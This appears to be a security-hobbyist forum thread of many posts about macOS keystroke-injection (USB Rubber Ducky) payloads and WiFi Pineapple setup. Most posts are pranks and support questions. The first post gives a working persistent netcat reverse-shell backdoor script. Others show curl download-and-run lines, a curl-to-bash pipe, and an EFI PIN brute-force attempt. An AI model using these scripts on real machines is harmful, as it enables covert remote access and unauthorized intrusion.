  1. Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very, very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple).

REM title: osx reverse shell - execute in background - minimize terminal - run on startup
DELAY 500
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 600
STRING touch script.sh
ENTER
STRING echo "mkfifo foo" > script.sh
ENTER
STRING echo "nc 4444 <foo | /bin/bash 1>foo" >> script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING clear
ENTER
GUI m

This simply creates a script with a netcat command that routes a command prompt to the host ( on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y
  2. I've recently been installing quite a couple virtual machines to try out my little duckies (nothing to say about the Windows scripts, they work wonders and we have plenty of feedback on that part). Yet I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject. All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in terminal will bypass that for a simple app installation. I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps. I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their code to make it work, and have been changing remotely the language used by the duckencoder 2.6.3 (or whatever version it is) to Canada French, English (US-French), Canada English, and have also been transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked. Every time I started the code:

DELAY 1000
COMMAND SPACE

The space command seems to be working well at least, haha; it does open the top-right corner prompt.

DELAY 800
STRING Terminal

Here starts the problem. Terminal comes out as something like IAELtmin; I tried making sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem.

DELAY 500
ENTER

Problem number 2: despite the weird wording, it doesn't even press enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesn't, which is weird.

DELAY 500
STRING curl http://SERVER/path/to/file.app > file.app
ENTER
DELAY 2000 (give it some time to download it)
STRING open -a file
ENTER

And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together. Now I've been working with iAtkos if anyone is familiar with it, all set up well, and have worked hours and tried many different variables to make this work, but the foundations themselves don't work (even the online encoder couldn't give me a good inject.bin output on the field). So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem? Also, on a side note, living in a French-Canadian area where I have no clue which language my friends have, I was wondering if the Canadian keyboard was unilateral, the same for everyone, and if, whether they are writing in English or French, the payload should work anyway (all with Canadian keyboards, all QWERTY, simply ctrl+shift changes the key mapping from French to English). Anyway, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows. Thanks in advance! -domino
  3. Hi, I have a bit of a newbie question so thanks in advance for any replies. I have just ordered my first Pineapple. Will the Mark V automatically connect to a Mac OSX via ethernet? I'm not talking about sharing an internet connection at this point, but just accessing the Pineapple's web interface. I cannot find any information online. Even the Wiki page related to this is empty: http://wiki.wifipineapple.com/index.php/OSX_ICS Thanks.
  4. Okay so I am going to get the MSI GT60 0NF-612US laptop and I wanted to know if I could run OSX in VirtualBox on it... I am only asking because when I tried it on my Dell Inspiron 1545 it said that I had the wrong processor or something, so I don't know if it would work on the laptop I'm going to get or not... Does anyone actually know why it didn't work? And will it work with this processor? Windows 7 Professional / Intel Core i7-3630QM Processor. I really just want to have the best of both worlds: Mac when I need it and Windows when I don't! Any help would be appreciated! -Thanks
  5. Hello again. I made another payload for Mac OSX. This one will print any file from the internet (you can delete the "curl -o" command to print a local file). If you don't want it to delete the printed file, just remove the "-r". But otherwise you only have to replace the brackets () and what's inside of them with your configuration. Please reply, doesn't matter what you say. I just want to see if I am wasting my time on something that no one cares about.

DELAY 2000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 1000
ENTER
DELAY 1000
STRING curl -O (here put a link to a photo or file to download, or delete the command to print a local file, ex. trollface.com/troll.jpg)
ENTER
DELAY 2000 (change this delay to adjust for your internet download speed/the file size)
STRING lpr -P (here put the name of the printer, ex. Hp-officejet) -# (here put the number of copies) -r (here navigate to the photo or file. It's in your home folder or home directory, ex. /home/jake/photo)
ENTER
DELAY 3000
Command-Q
  6. Hi!! I have a question! Now that SimCity is playable offline, isn't it possible to hack it? Especially for Mac ;) Thx
  7. This is a modified version of the OS X YouTube blaster. That one's link format no longer autoplays. This one also loops because why would you want to only listen to it once? If Rick's not your style, just swap the video id (oHg5SJYRHA0 in this case) for whatever you'd like.

DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 2000
ENTER
DELAY 1000
STRING osascript -e 'set volume 7'
ENTER
STRING open https://youtube.googleapis.com/v/oHg5SJYRHA0%26autoplay=1%26loop=1
ENTER
  8. Hey guys, if anyone's aware of THC's IPv6 attack suite against the IPv6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on Linux natively; the readme suggests they will not work on OS X. Are there any alternative methods for router flooding from native OS X? Thanks
  9. Hoping someone can help me here. I just received my USB Rubber Ducky in the mail and I'm stuck as the Keyboard Setup Assistant wants me to identify the keyboard before it will allow me to continue if I plug the ducky in. The only way I can think of getting around this is to put a delay in to allow me to click "Continue" and then program the corresponding keys in my script to get through the assistant before executing any other commands. This is not ideal though. Does anyone know of a way around this issue? I am running OS X 10.8.3 by the way. Any help would be greatly appreciated.
  10. This is my first payload - it works with Mavericks and doesn't require any password input. It downloads a 1920x1080 trollface picture and sets it as the desktop background. If you want a different picture just change the URL. And if you want the new picture to have a relevant filename, make sure you change it on both the "curl" and "osascript" lines.

DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 2000
ENTER
DELAY 1000
STRING cd ../Shared
ENTER
STRING curl -o 'trollface.jpg' 'http://khongthe.com/wallpapers/entertainment/trollface-1080p-32389.jpg'
ENTER
STRING osascript -e 'tell application "Finder" to set desktop picture to POSIX file "/Users/Shared/trollface.jpg"'
ENTER

edit: After trying different combinations of delays, I found the above to have the most consistent success out of the several I tried (still not applaudable though). The whole command-space, search, launch process on OS X seems to be a bit fickle. Does anyone have any tips to shave time off and/or have it be more consistently successful?
  11. Hi! I know that you can already find a small number of payloads on GitHub, but there are many more that have been created by the community. For example, we found none for Android on GitHub. And I have experienced the difficulty of finding exactly what I need ;) That's why I think it would be a good initiative to gather as many payloads as possible on this topic. If you have created an effective and fun one, or if you regularly use one made by another member, why not post it below to share it? (Select those that are not already on GitHub for the moment, please.) If you are interested, try to complete a short form of this type and post it below.

Title :
Author :
Target :
Description :

Obviously, if it does not seem to be a good idea, let me know -_-
  12. Hi everyone, I'm trying to use a pipe symbol ( | ) on a French Mac keyboard. The key combination to do it is Shift+Alt+L. What I want to print in a terminal is:

curl -L http://bit.ly/10hA8iC | bash

(which by the way is really fun, it plays a rickroll inside the Mac terminal!) All my script is working great, but the only issue is that pipe symbol. I've tried several things, like:

STRING curl -L http://bit.ly/10hA8iC | bash

or

STRING curl -s -L http://bit.ly/10hA8iC
SPACE
DELAY 20
ALT-SHIFT l
DELAY 20
SPACE
DELAY 20
STRING bash
DELAY 50
ENTER

I saw a forum post saying that maybe the Rubber Ducky can't handle 3-key combinations, so I don't know... If anyone has an idea or at least the same pb... Maybe I'm missing something obvious here, so excuse me for my noobness (& my English!). Thanks a lot, Wook
  13. Hi all, just got my first USB Rubber Ducky and decided to write a payload to prank some friends.

REM Title: OSX background changer
REM This payload will open terminal, download an image to the default desktop
REM pictures directory, set it as the background then kill the dock to
REM refresh the background. It also closes the terminal window.
DELAY 3000
GUI SPACE
STRING terminal
DELAY 200
ENTER
DELAY 200
STRING cd /Library/Desktop\ Pictures
DELAY 200
ENTER
STRING curl -s -O http://YOUR_URL_HERE/1.jpg
ENTER
DELAY 2000
STRING defaults write com.apple.desktop Background '{default = {ImageFilePath = "/Library/Desktop Pictures/1.jpg";};}'
ENTER
DELAY 200
STRING killall Dock
ENTER
STRING killall Terminal
ENTER

Be sure to put in a valid URL of the image you want to set as the background. This works best if you're using the latest firmware with the vidpid.bin file set to 05ac 0202. It's my first payload, so if you see anything the matter, please let me know. L
  14. Should the br-lan, wlan0 and eth0 have the same MAC address?? As mine does. Should these not be different??
  15. The instructions in the manual are straight forward (RTFM), however what is the format for the MAC address when you enter it as a Client Blacklist? With the colons, dashes or none? And is there another way to list them via SSH, etc.?
  16. Hey everyone, I created a payload to find the MacBook Air EFI 4-digit PIN, but the problem is that after 3 wrong attempts you have to wait 1 minute. After 3 other attempts, 5 minutes, and then 15 minutes and so on... Is there another way to find that damn PIN? My script was like this:

STRING 0000
ENTER
DELAY 1000
STRING 0001
ENTER
DELAY 1000
STRING 0002
ENTER
DELAY 1000

and when I enter the 3rd PIN wrong I have to wait.
  17. Does anyone have the payload (or script) to brute force Mac's efi 4-digit pin? I would really appreciate it...
  18. Hey gang! Wanted to share this cool little script I ran into for updating your Facebook Status with Bash! B) For Linux and (Get ready) Mac OS X http://360percents.com/posts/bash-script-to-update-facebook-status-linux-mac-os-x/
  19. I cannot connect to the Pineapple's web-based control center on a Mac OS X. I have followed the instructions provided by Chris Haralson's tutorial (link shown below), but when I enter the IP address, nothing happens! Can someone help me out? Thanks in advance!

Link: "How to: Configure a Wifi Pineapple for use with Mac OS X"

Steps:
(i) In the "Network" tab, I set the service order (wifi above the ethernet)
(ii) Manually configured the ethernet as IPv4 address : Subnet Mask : Router: (blank) Dns server:
(iii) In the "Sharing" tab, I checked internet sharing with sharing from "wifi" to "ethernet"
(iv) Powered up the Pineapple Mark IV and connected its PoE LAN port to my Mac OS X 10.8.4 64-bit kernel (Intel-based)
(v) Opened web browser (Safari Version 6.0.5) and entered the IP address. Nothing happens here!
  20. Hey, looking at the examples on GitHub and on the forums, I see a lot of fun payloads for Windows, but almost none for Mac and zero for Linux. Are there any cool Linux/Mac payloads out there that I should check out?
  21. Hi Guys, I'm seeking help and would like to have a discussion about booting Linux on Apple hardware using an EFI boot loader. Probably not going to be a popular suggestion considering one of your sponsors is System76 but I thought I'd give it a try regardless. I came across a great tool called "Mac Linux USB Loader" which is still under heavy development. "This is the Mac Linux USB Loader, a tool allowing you to take an ISO of a Linux distribution and make it boot using EFI." http://sevenbits.github.io/Mac-Linux-USB-Loader/ https://github.com/SevenBits/Mac-Linux-USB-Loader I spoke to "SevenBits" the developer and there's an unresolved problem he hasn't been able to fix, which affects myself and others who use older Macbook Pro hardware (late 2008 4,1 and others). "I actually have an early 2008 MacBook Pro which also fails to boot Linux. I test the bootable drives my tool creates on a newer, separate machine. I believe with 90% certainty that the reason for this problem is the lack of Linux kernel mode setting (KMS) support in Apple's EFI firmware, which is required for nVidia video drivers to function properly. Disabling KMS in the boot options of most distros actually causes the splash screen to show up, but then X (the graphical windowing system used to provide a desktop) can't start because KMS is disabled, and so you are dropped into the terminal with a bash shell. If you like command line Ubuntu, this is fine, you can just connect to the web via Ethernet (and even install WiFi drivers) and go, but for 90% of us, this is an inadequate solution." Have you, or anyone you know had success finding a solution to this problem? Thanks, cryptomule
  22. Hey guys, I would like to go about creating a payload for the Rubber Ducky that pretty much does the same thing as the *RunEXE from SD* payload but on OSX using a .JAR file. How would I do this? The payload for EXE files on windows uses a batch file that waits for the SD card to be mounted but OSX doesn't use batch files? Sorry for my inexperience, I am both a Windows and a Kali user but need this payload for penetration testing on Macs. I think the only alternative would be to open a OSX backdoor and download and run the file in terminal. I would rather not resort to this though because if I was trying to install on multiple machines I would have to change the listening port every time to download the file. A little more time consuming and inefficient compared to a straight SD card transfer and run.
  23. I'm new to the Pineapple but I love it so far. Just thought I'd share a process to get Internet Connection Sharing working in Mac OSX without having to make manual edits to the Pineapple as the Wiki states. This requires the Network Manager infusion to be installed.

Step 1: Connect the Mac's wifi to your Internet-connected AP
Step 2: Ensure to "Set Service Order" under the Network preferences, put the Wifi above the Ethernet
Step 3: Also in Network prefs set the IP address of the Ethernet connection manually -, subnet is, router is blank, and DNS is
Step 4: Plug the cat5 cable into the WAN/LAN port on the pineapple
Step 5: Go to "Sharing" in System Prefs, in "Internet Sharing" set WiFi to Ethernet, check the box and hit start. (This step will assign an IP address of to the WAN/LAN port; this is visible on the pineapple's Status page.)
Step 6: In the Network Manager infusion go to the ICS tab, set Share Internet From eth1 to wlan0 (or br-lan in some instances) then click save.

The only thing unique with my setup is my Air doesn't have a NIC port so I'm using a USB to Ethernet adapter. It should be obvious but I used a different device connected to the pineapple AP to make changes while my Air was in use. You could use a different laptop and connect to the LAN/POE port but an iPad or tablet with wifi works just fine. Please let me know if this works for you. If it does maybe this can be added to the Wiki. Thanks, thesugarat
  24. Hello all, I stumbled across the hak5 store today, and after reading about the Wifi Pineapple I think I'm going to order one soon. My current computer is a Macbook Pro running OSX 10.7.4. I also have an Ubuntu 12.04 VM (VirtualBox). Will I be able to configure and work with the Wifi Pineapple easily enough? From what I've read, trying to use OSX can be difficult and Linux is preferred, but I'm wondering if trying to configure the Wifi Pineapple with a VM brings about any extra complications. I also have a laptop running Windows 7, if that would be the easiest option. However it's a work computer, so I'd rather not, if possible. Hopefully this question's not too vague, if there's other information I should be providing, please let me know! Thanks.
  25. Hi all, first-time user here and before I ask my question I'd just like to say a big thank you to all the people who have worked on the MKIV and the people who contribute to the forums and wikis. I bought myself an ap121u and flashed it in no time at all with little prior experience; couldn't have been easier. I've used a script provided by lsc on these forums to get my internet tethering via wifi and an Alfa dongle working great, apart from one thing. It doesn't seem to change the MAC address of the above-mentioned dongle. I've tried doing it manually and also setting a MAC as per below.

ifconfig wlan1 down
macchanger -m 00:11:22:33:44:55 wlan1
ifconfig wlan1 up

Comes up with the error "ERROR: Can't change MAC: interface up or not permission: Invalid argument" after trying to change. Any ideas? I'm probably overlooking something simple. I haven't tried changing wlan0 yet but I guess that will be fine; is it because I'm not using the supported dongle? Driver issue? A point in the right direction or any help would be great. Thanks again, Tom.
